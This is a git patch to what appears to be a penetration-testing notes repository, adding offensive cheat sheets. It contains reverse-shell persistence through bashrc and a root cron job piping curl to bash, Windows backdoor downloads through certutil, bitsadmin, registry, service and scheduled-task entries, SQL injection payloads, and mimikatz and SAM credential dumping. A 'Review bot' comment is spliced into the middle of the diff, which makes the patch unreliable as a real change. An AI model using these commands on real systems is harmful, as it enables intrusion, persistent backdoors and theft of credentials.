From 9623d1008d296124bda738d2b3a2579011495c33 Mon Sep 17 00:00:00 2001 From: whx Date: Wed, 8 Sep 2021 02:09:14 +0200 Subject: [PATCH] bump --- enumeration/docs/ffuf.md | 4 ++ enumeration/docs/nmap.md | 4 ++ .../docs/pwntools_specifics.md | 15 +++++ exploit/python/flask_cookie_decode.py | 36 ++++++++++ exploit/sqli/sqli.md | 36 ++++++++-- .../javascript}/prototype_pollution.md | 0 exploit/web/php/command_injection.md | 10 +++ persistence/bashrc.md | 8 +++ persistence/crontab.md | 15 +++++ persistence/persistence.md | 67 +++++++++++++++++++ pivoting.md | 4 +- post_exploitation/docs/metasploit.md | 14 +++- post_exploitation/docs/powershell.md | 8 +++ reverse_shells/docs/msfvenom.md | 4 ++ 14 files changed, 217 insertions(+), 8 deletions(-) create mode 100644 exploit/buffer_overflow/docs/pwntools_specifics.md create mode 100644 exploit/python/flask_cookie_decode.py rename exploit/{ => web/javascript}/prototype_pollution.md (100%) create mode 100644 exploit/web/php/command_injection.md create mode 100644 persistence/bashrc.md create mode 100644 persistence/crontab.md create mode 100644 persistence/persistence.md create mode 100644 post_exploitation/docs/powershell.md diff --git a/enumeration/docs/ffuf.md b/enumeration/docs/ffuf.md index 7b8001c..42513a5 100644 --- a/enumeration/docs/ffuf.md +++ b/enumeration/docs/ffuf.md @@ -31,6 +31,10 @@ ffuf -u http:///sqli-labs/Less-11/ -c -w /usr/share/seclists/Passwords/Leake ```sh ffuf -u http://FUZZ.test.com -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt ``` +or if the subdomains are listed in the target's host file +```sh +ffuf -w /usr/share/seclists/Discovery/DNS/namelist.txt -H "Host: FUZZ.test.com" -u http:// -fs 0 +``` * Fuzz Vhosts & Server Blocks ```sh ffuf -u http://FUZZ.test.com -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -fs 0 diff --git a/enumeration/docs/nmap.md b/enumeration/docs/nmap.md index b15bdbc..3333bfb 100644 --- a/enumeration/docs/nmap.md 
+++ b/enumeration/docs/nmap.md @@ -15,3 +15,7 @@ nmap -oA nmap-vuln -Pn -script vuln -p sudo nmap -oA --nmap-full -sS -sC -sV -p- --defeat-rst-ratelimit searchsploit --nmap ./nmap-full.xml --verbose ``` +## Wordpress Enumeration +```sh +nmap --script http-wordpress-enum --scripts-args check-latest=true,search-limit=1500 -p 80 test.com +``` diff --git a/exploit/buffer_overflow/docs/pwntools_specifics.md b/exploit/buffer_overflow/docs/pwntools_specifics.md new file mode 100644 index 0000000..14bafbb --- /dev/null +++ b/exploit/buffer_overflow/docs/pwntools_specifics.md @@ -0,0 +1,15 @@ +# pwntools + +## Memory Addresses of ELF Binary +* Find address of function and use it on $eip +```python +p = process() +elf = ELF() +__function = elf.symbol. +payload = fit({ + 42: __function # Length measured via cyclic +}) +p.sendline() +proc.interactive() +``` + diff --git a/exploit/python/flask_cookie_decode.py b/exploit/python/flask_cookie_decode.py new file mode 100644 index 0000000..d6f9a49 --- /dev/null +++ b/exploit/python/flask_cookie_decode.py @@ -0,0 +1,36 @@ +import zlib +import sys +import json +from itsdangerous import base64_decode + + +def decode(cookie): + """ + Decode a Flask cookie + + https://www.kirsle.net/wizards/flask-session.cgi + """ + try: + compressed = False + payload = cookie + + if payload.startswith('.'): + compressed = True + payload = payload[1:] + + data = payload.split(".")[0] + + data = base64_decode(data) + if compressed: + data = zlib.decompress(data) + + return data.decode("utf-8") + except Exception as e: + return f"[Decoding error: are you sure this was a Flask session cookie? {e}]" + + +cookie = sys.argv[1] +data = decode(cookie) +json_data = json.loads(data) +pretty = json.dumps(json_data, sort_keys=True, indent=4, separators=(",", ": ")) +print(pretty) diff --git a/exploit/sqli/sqli.md b/exploit/sqli/sqli.md index d1432d3..dac5111 100644 --- a/exploit/sqli/sqli.md +++ b/exploit/sqli/sqli.md 
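Review bot: The friendly error path in `decode()` is unreachable from the caller: on failure it returns the `[Decoding error: …]` string, which the top level then passes to `json.loads()`, so the user sees a `JSONDecodeError` traceback instead of the message, and running the script with no argument dies with `IndexError` on `sys.argv[1]`. I would let `decode()` propagate exceptions and handle them once at the CLI boundary, together with a usage check, as below. A docstring caveat is worth adding too: the script discards everything after the first `.` (presumably the timestamp and signature), so it reads the payload without the app's secret but neither verifies nor can forge it — something like `# Payload is signed, not encrypted: decoding needs no key, forging still needs SECRET_KEY.` Finally, `zlib.decompress()` here is unbounded, which is fine for a one-off CLI but should not be reused server-side on untrusted cookies without a size cap.
```python
def decode(cookie):
    """Return the decoded Flask session payload as a UTF-8 string.

    Only the first dot-separated segment is decoded; the timestamp and
    signature are dropped, so no key is needed and nothing is verified.
    Raises on malformed input instead of returning a message.
    """
    # … unchanged: strip leading '.', split, base64_decode, zlib.decompress …
    return data.decode("utf-8")


if len(sys.argv) != 2:
    sys.exit(f"usage: {sys.argv[0]} <flask-session-cookie>")

try:
    json_data = json.loads(decode(sys.argv[1]))
except Exception as e:  # BadData, zlib.error, UnicodeDecodeError, JSONDecodeError
    sys.exit(f"[Decoding error: are you sure this was a Flask session cookie? {e}]")

print(json.dumps(json_data, sort_keys=True, indent=4, separators=(",", ": ")))
```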
@@ -1,33 +1,43 @@ # SQL Injection -# Finding an Opportunity +* [MySQL Comments](https://blog.raw.pm/en/sql-injection-mysql-comment/) + +## Finding an Opportunity * GET parameter ```sh http://example.com/index.php?id=' or 1=1 -- - ``` +* Sometimes an ID or may come first +```sh +http://example.com/index.php?id=10 or 1=1 -- + +http://example.com/index.php?id=10' or '1'='1'-- - +http://example.com/index.php?id=-1' or 1=1 -- -&password=x +``` * Provoke error to gain information ```sh http://example.com/index.php?id=' ``` +* **Incase of client side sanitization craft the URL instead of using the form!!!** -# Usage - +## Usage * Example, terminate string via `'` and resolve via tautology, comment the rest of the string via `--` ```sql SELECT * FROM users WHERE username = admin AND password := ' and 1=1 -- - SELECT * FROM users WHERE username = admin AND password := ' or 1=1 --+ ``` -* Boolean True and False +### Boolean True and False ```sql SELECT * FROM users WHERE username = admin AND password :=1' or 1 < 2 --+ SELECT * FROM users WHERE username = admin AND password :=1' or 1 > 2 --+ ``` -* Blind injection // Guessing characters +### Blind injection // Guessing characters ```sh http://example.com/?id=1' substr((select database()),1,1)) < 105 --+ ``` +* Function substr(string, start, length) +* sqlmap via `--level=5 --risk=3 --dbms=sqlite --technique=b --dump` ### Union based * Check number of cols @@ -52,6 +62,13 @@ http://example.com/?id=1' substr((select database()),1,1)) < 105 --+ * [OWASP SQLi Docs](https://www.owasp.org/index.php/SQL_Injection) +### Identify Database +```sh +id=sqlite_version() +id=@@version # mysql/mssql +id=(SELECT banner FROM v$version) # oracle +``` + #### SQL Functions * Use sql functions to fumble the tables & cols via union * [source](https://medium.com/@nyomanpradipta120/sql-injection-union-attack-9c10de1a5635) 
@@ -59,6 +76,11 @@ http://example.com/?id=1' substr((select database()),1,1)) < 105 --+ ```sql 1' and 1=2 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema = database() -- - ``` +* sqlite specific +```sql +(SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='usertable') +(SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%') +``` * Extract cols ```sh 1' and 1=2 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema = database() and table_name ='user'-- - @@ -78,6 +100,10 @@ http://example.com/?id=1' substr((select database()),1,1)) < 105 --+ sqlmap -r request.txt --dbms=mysql --dump sqlmap -r request.txt --batch ``` +* Select form data automatically +```sh +sqlmap -u http:///site.php --forms --dump-all +``` |Parameter|Details| diff --git a/exploit/prototype_pollution.md b/exploit/web/javascript/prototype_pollution.md similarity index 100% rename from exploit/prototype_pollution.md rename to exploit/web/javascript/prototype_pollution.md diff --git a/exploit/web/php/command_injection.md b/exploit/web/php/command_injection.md new file mode 100644 index 0000000..9036825 --- /dev/null +++ b/exploit/web/php/command_injection.md @@ -0,0 +1,10 @@ +# PHP Command Injection +Injecting commands to execute code on the server side via php. + +## Blind Command Injection +Attacker does not register a direct response. + +### Detect Blind Command Injection +Try to save output to URI resource like `output.php` + +## Active Command Injection diff --git a/persistence/bashrc.md b/persistence/bashrc.md new file mode 100644 index 0000000..bcd46a5 --- /dev/null +++ b/persistence/bashrc.md @@ -0,0 +1,8 @@ +# Bashrc Bogus + +## Add Reverse Shell +```sh +echo 'bash -c "bash -i >& /dev/tcp// 0>&1"' >> ~/.bashrc +``` + + diff --git a/persistence/crontab.md b/persistence/crontab.md new file mode 100644 index 0000000..50df63c --- /dev/null 
+++ b/persistence/crontab.md @@ -0,0 +1,15 @@ +# Cronjobs + +* `crontab -l` +* `cat /etc/crontab` + +## Add Cronjob +* Add line +```sh +* * * * * root curl http://:8000/shell.sh | bash +``` + * Shell content + ```sh + bash -c "bash -i >& /dev/tcp// 0&1" + ``` + diff --git a/persistence/persistence.md b/persistence/persistence.md new file mode 100644 index 0000000..c2f39e0 --- /dev/null +++ b/persistence/persistence.md 
@@ -0,0 +1,67 @@ +# Persistence + +* Gain through + * Startup folder persistence + * Editing registry keys + * Scheduled tasks + * SUID + * BITS + * Creating a backdoored service + * Creat user + * RDP + +## Gain Persistence on Windows +* Browser. Add to trusted sites. +* Powershell +```sh +Invoke-WebRequest http://:/shell.exe -OutFile .\shell2.exe +``` +* DOSprompt +```cmd +certutil -urlcache -split -f http://:\AppData\Roaming\backdoor.exe" +``` +### Background Intelligence Transfer Service (BITS) +```sh +bitsadmin /create __shell__ +bitsadmin /addfile __shell__ "http://:/shell2.exe" "C:\Users\\Documents\shell2.exe" +``` +```sh +bitsadmin /SetNotifyCmdLine 1 cmd.exe "/c shell2.exe /complete __shell__ | start /B C:\Users\\Documents\shell2.exe" +bitsadmin /SetMinRetryDelay 30 +bitsadmin /resume +``` + +## High Priv +* Create user `net user /add ` +* Add to admin group via `net localgroup Administrator /add` +* Check `net localgroup Administrator` + +### Add to registry +* Execute on user logon via +```sh +reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d "Userinit.exe, C:\yadda\shell2.exe" /f +``` +### Add a Service +* Inside meterpreter `load powershell` and `powershell_shell` +```sh +New-Service -Name "" -BinaryPathName "" -Description "" -StartupType "Boot" +``` +### Add Scheduled Task +```sh +$A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C"\Users\Administrator\Documents\rshell.exe +$B = New-ScheduledTaskTrigger -AtLogOn +$C = New-ScheduledTaskPrincipal -UserId "NT AUTHORITY/SYSTEM" -RunLevel Highest +$D = New-ScheduledTaskSettingsSet +$E = New-ScheduledTask -Action $A -Trigger $B -Principal $C -Settings $D +Register-ScheduledTask ReverseShell -InputObject $E +``` diff --git a/pivoting.md b/pivoting.md index b58c3e7..b7fa757 100644 --- a/pivoting.md +++ b/pivoting.md 
@@ -21,9 +21,10 @@ for i in {1..65535}; do (echo > /dev/tcp/192.168.0.1/$i) >/dev/null 2>&1 && echo ## Tools ### Enumerating a network using native and statically compiled tools ### Proxychains / FoxyProxy -* Proxychains +* Proxychains, e.g. scan target via nmap, or connect via nc thorugh jump server ```sh proxychains nc + proychains nmap ``` * Use `/etc/proxychains.conf` or `./proxychains.conf`containing: ``` @@ -32,6 +33,7 @@ for i in {1..65535}; do (echo > /dev/tcp/192.168.0.1/$i) >/dev/null 2>&1 && echo # meanwhile # defaults set to "tor" socks4 127.0.0.1 9050 + #socks5 127.0.0.1 1337 # proxy_dns ``` * FoxyProxy diff --git a/post_exploitation/docs/metasploit.md b/post_exploitation/docs/metasploit.md index 80e6861..414fb9d 100644 --- a/post_exploitation/docs/metasploit.md +++ b/post_exploitation/docs/metasploit.md @@ -26,15 +26,25 @@ use ``` * Fill options like `session` and run the exploit -### Privilige Escalation on Windows Using Metasploit +### Privilege Escalation on Windows Using Metasploit * Find process with higher privs and migrate to it. Example `spoolsv.exe`. ```sh migrate -N spoolsv.exe ``` - * After `NT AUTHORITY\SYSTEM` is gained start mimikatz. and dump all creds +* After `NT AUTHORITY\SYSTEM` is gained start mimikatz. and dump all creds ```sh load kiwi help creds_all ``` * Enable RDP via `run post/windows/manage/enable_rdp` + +### Hashdump on Windows +* Meterpreter +```sh +run post/windows/gather/hashdump +``` +```sh +load kiwi +lsa_dump_sam +``` diff --git a/post_exploitation/docs/powershell.md b/post_exploitation/docs/powershell.md new file mode 100644 index 0000000..7d0def6 --- /dev/null +++ b/post_exploitation/docs/powershell.md @@ -0,0 +1,8 @@ +# Powershell + +## HashDump +```sh +save HKLM\SAM C:\Users\Administrator\Desktop\SAM +save HKLM\SAM C:\Users\Administrator\Desktop\System +``` +* Use `samdump2` diff --git a/reverse_shells/docs/msfvenom.md b/reverse_shells/docs/msfvenom.md index 1b78e43..6c0a5e4 100644 
--- a/reverse_shells/docs/msfvenom.md +++ b/reverse_shells/docs/msfvenom.md @@ -37,6 +37,10 @@ or ``` powershell -c "Invoke-WebRequest -Uri 'ip/shell.exe' -OutFile 'C:\Windows\Temp\shell.exe'" ``` +or on cmd.exe +```sh +certutil -urlcache -split -f http://:/shell.exe +``` ## Unix ### netcat reverse